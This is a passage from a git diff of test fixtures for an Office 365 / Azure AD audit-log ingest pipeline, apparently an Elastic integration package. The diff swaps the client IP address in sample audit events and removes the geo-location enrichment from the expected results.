"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -25387,9 +25387,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:42", "ExtendedProperties": [ { @@ -25618,7 +25618,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -25648,9 +25648,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:42", "ExtendedProperties": [ { diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json index d5d4fd60bc0..5a574c2ea18 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json @@ -2,25 +2,7 @@ "expected": [ { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -34,7 +16,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -148,7 +130,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -160,12 +142,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036007400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n 